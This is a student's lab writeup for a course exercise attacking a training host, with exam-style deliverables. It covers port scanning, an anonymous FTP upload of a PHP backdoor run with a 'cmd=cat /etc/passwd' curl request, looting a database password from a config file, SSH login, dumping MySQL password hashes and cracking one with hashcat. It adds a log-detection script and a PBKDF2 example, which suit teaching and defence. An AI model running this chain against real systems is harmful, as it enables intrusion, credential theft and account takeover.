Lab 7.1 - Exploiting Pippin

Exploiting pippin.shire.org (10.0.5.25)

The goal of this lab is to find and exploit vulnerabilities in the pippin.shire.org application. We will be working through active recon and service enumeration, remote code execution, loot, and elevation.

Passive Recon

I wanted to scan the site to see if I could find any info that could help me better exploit it.

The image below appears to be a list of users, including the admin.

Active Recon and Service Enumeration

Check for open ports

  • do the default nmap scan

  • sudo nmap pippin.shire.org and sudo nmap 10.0.5.25

Open ports:

  • 22/tcp - ssh

  • 21/tcp - ftp

  • 80/tcp - http

Check for port services and versions

  • sudo nmap -sV -p 80 10.0.5.25

  • sudo nmap -sV -p 21 10.0.5.25

  • sudo nmap -sV -p 22 10.0.5.25

The web server is Apache HTTP Server 2.4.6.

Deliverable 1. Provide screenshots of open ports, their services, and their versions.

Browse to the website

Attempt to SSH as admin to the site

Connect to server with FTP

ftp 10.0.5.25

I attempted to see if I could execute commands with FTP, but I was not able to since I didn't have the correct credentials.

Deliverable 2. Provide screenshots of the services as they respond to client applications like web browsers and command-line clients.

Deliverable 3. Have you found any of the services particularly interesting? Please explain using annotated screenshots and brief captions or descriptions.

I think that FTP is going to be a great way to exploit the system. It looks like if I can get the right credentials, I can upload files to the remote host and also view remote system directories and files.

Remote Code Execution

Log into FTP with anonymous user

User:  anonymous
Password:  anonymous@domain.com

What is Anonymous FTP?

Anonymous FTP is a means by which archive sites allow general access to their archives of information. These sites create a special account called "anonymous".

Traditionally, this special anonymous user account accepts any string as a password, although it is common to use either the password "guest" or one's electronic mail (e-mail) address. Some archive sites now explicitly ask for the user's e-mail address and will not allow login with the "guest" password. Providing an e-mail address is a courtesy that allows archive site operators to get some idea of who is using their services.

Upload a test file via FTP

sudo ftp 10.0.5.25
cd upload
put Iwillputglitteronyou.txt
List of the uploaded files (mine is Iwillputglitteronyou.txt)

Deliverable 4. Upload a test file (give it a distinctive Safe for Work name) and provide proof that you've done so in the form of screenshots of commands and output.

Deliverable 5. Provide evidence of remote code execution such that you can output the systems /etc/passwd file. How did you do this? Are there any accounts of interest? (At this point you should at least have the privileges of the attacked service)

  • I uploaded a php backdoor called hannelore-backdoor.php to the ftp server.

  • I then used the command curl "http://10.0.5.25/upload/hannelore-backdoor.php?cmd=cat+/etc/passwd" to remotely execute the commands on the webserver.

Remote command execution
End of /etc/passwd: peregrin.took will most likely be the username we want to find the password for.
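The chain above (anonymous FTP upload into a web-served directory, then a script called through the web server) leaves a clear trace in the Apache access log. The following added detection example is not part of the original writeup; it parses constructed combined-format log lines and flags requests for executable scripts under /upload/ that carry a typical command parameter. The directory name, script extensions and parameter names are assumptions for this lab.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Apache combined-log layout (assumed; adjust the pattern for other LogFormat settings)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Upload directories must never serve executable scripts; any hit here is worth a look
UPLOAD_DIRS = ("/upload/",)
SCRIPT_EXT = (".php", ".phtml", ".php5")
# Query parameters that one-line command shells commonly read
SHELL_PARAMS = {"cmd", "c", "exec"}


def inspect_request(line):
    """Return a finding dict for a script request under an upload dir, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    path = unquote_plus(parts.path)
    if not path.startswith(UPLOAD_DIRS) or not path.lower().endswith(SCRIPT_EXT):
        return None
    args = {k: v[0] for k, v in parse_qs(parts.query).items() if k in SHELL_PARAMS}
    status = int(m.group("status"))
    # A served (200) script with a command argument is the strongest signal
    severity = "high" if args and status == 200 else ("medium" if args else "low")
    return {"src": m.group("ip"), "path": path, "status": status,
            "args": args, "severity": severity}


def scan(lines):
    """Run inspect_request over every line and keep the findings."""
    return [f for f in (inspect_request(l) for l in lines) if f]


# Constructed sample log lines (not taken from the lab machine)
SAMPLE_LOG = """\
10.0.5.90 - - [10/Oct/2023:13:55:36 -0400] "GET /index.php?title=Main_Page HTTP/1.1" 200 5123
10.0.5.90 - - [10/Oct/2023:13:56:01 -0400] "GET /upload/Iwillputglitteronyou.txt HTTP/1.1" 200 21
10.0.5.90 - - [10/Oct/2023:13:57:12 -0400] "GET /upload/hannelore-backdoor.php?cmd=cat+/etc/passwd HTTP/1.1" 200 2048
10.0.5.90 - - [10/Oct/2023:13:58:40 -0400] "GET /upload/notes.php HTTP/1.1" 404 196
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(finding)
```

The durable fix is configuration rather than detection: the upload directory should be outside the document root or have script execution disabled in the Apache configuration.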

Test your uploaded file in the browser

Since ftp allowed us to upload files to the server, we can use that to

https://www.kali.org/tools/php-defaults/

Loot

By leveraging a permissions issue in a misconfigured service, you should be able to find sensitive data if you look hard. Find the password!!!

Deliverable 6. What did you find and how did you find it? Can you leverage this data to your advantage?

  • Running the FTP client as root, I downloaded all PHP files to my local machine by using the get command. I did this so I wouldn't have to keep going back to the FTP server if I couldn't find the password in a file.

  • I then tried to grep each of the files for the peregrin username in case the password was associated with the username in some way.

    • This did not turn up anything in any of the files.

  • I specifically took interest in the LocalSettings.php file and catted it to look through the settings.

    • Just by chance I opened this one and found the password, but I could have grepped the file with password instead of peregrin and would have found the password that way as well.

Here is the password in the LocalSettings.php file.

Found the password!!

Deliverable 7. You should be able to get into pippin as an authorized user. Provide a screenshot showing your session and cat the user-flag.

ssh peregrin.took@10.0.5.25

Elevation

Now, the web server has an application, and that application stores its data in yet another service that you likely did not see during your active reconnaissance. Leverage some of the secret data you've found to interact with this internal service to see if there is any other information about users that you might be able to use.

Deliverable 8. Enumerate this internal data source to determine where and in what fields useful data might exist. You very likely learned about this system in SYS255,265 and SEC260. Break out your old notes and get on with it. Describe what you found. In the end, you are looking for a new identity and a credential.

  • Since we found the database information above, we should start by logging into the SQL database.

mysql -u root -p
SHOW DATABASES;
Logging into the SQL database
USE mediawiki;
SHOW TABLES;
The user table in mediawiki
SELECT * FROM user;
Users with password hashes

Going back to the main directory, I catted the pippin_hash.txt file to see what hash was inside. It was the same hash that I found in the SQL database!

Crack the Hash!

sha512:30000:7zMbdjXKrFDDq4CRF5q9ow==:49ImFWdWRVz2dCDsJPj+P0Xovz153VenjKk7npuK7u5xgo21IUh+eY0QH8fQxdH/Cjx3zxZyQcfNChAnP11GNg==

  • The password starts with a lowercase 'p'

    • Filter the password file with grep -v 'P' CommonPasswords.txt > no_P_passwords.txt

  • It is in rockyou

Filtering out words with an uppercase P
hashcat -m 12100 -a 0 pippin_hash.txt no_P_passwords.txt
Cracked hash
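The hash line above is in hashcat's mode 12100 layout: digest name, PBKDF2 iteration count, base64 salt, base64 derived key. The added Python example below (not part of the original writeup) parses that line, recomputes PBKDF2-HMAC-SHA512 for a candidate the way the application does at login, and shows why the 30000-iteration cost is what slows a wordlist attack. The make_hash_line helper and the constructed password are my own additions for demonstration.

```python
import base64
import hashlib
import hmac
import os

# Hash line from this writeup: sha512:<iterations>:<base64 salt>:<base64 derived key>
LAB_HASH_LINE = (
    "sha512:30000:7zMbdjXKrFDDq4CRF5q9ow==:"
    "49ImFWdWRVz2dCDsJPj+P0Xovz153VenjKk7npuK7u5xgo21IUh+eY0QH8fQxdH/Cjx3zxZyQcfNChAnP11GNg=="
)


def parse_hash_line(line):
    """Split a digest:iterations:salt:dk line into typed parts."""
    algo, iters, salt_b64, dk_b64 = line.strip().split(":")
    return {
        "algo": algo,
        "iterations": int(iters),
        "salt": base64.b64decode(salt_b64),
        "dk": base64.b64decode(dk_b64),
    }


def make_hash_line(password, iterations=30000, salt=None):
    """Constructed helper: build a line in the same layout for a new password."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, iterations, dklen=64)
    return "sha512:%d:%s:%s" % (
        iterations, base64.b64encode(salt).decode(), base64.b64encode(dk).decode()
    )


def verify_candidate(line, candidate):
    """Recompute PBKDF2 with the stored salt and iteration count, compare in constant time.
    This is the per-guess work a wordlist attack must repeat; raising the iteration
    count raises the cost of every guess by the same factor."""
    p = parse_hash_line(line)
    dk = hashlib.pbkdf2_hmac(
        p["algo"], candidate.encode(), p["salt"], p["iterations"], dklen=len(p["dk"])
    )
    return hmac.compare_digest(dk, p["dk"])


if __name__ == "__main__":
    parsed = parse_hash_line(LAB_HASH_LINE)
    print("iterations:", parsed["iterations"], "salt bytes:", len(parsed["salt"]),
          "dk bytes:", len(parsed["dk"]))
    demo = make_hash_line("constructed-demo-password")
    print("demo verifies:", verify_candidate(demo, "constructed-demo-password"))
```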
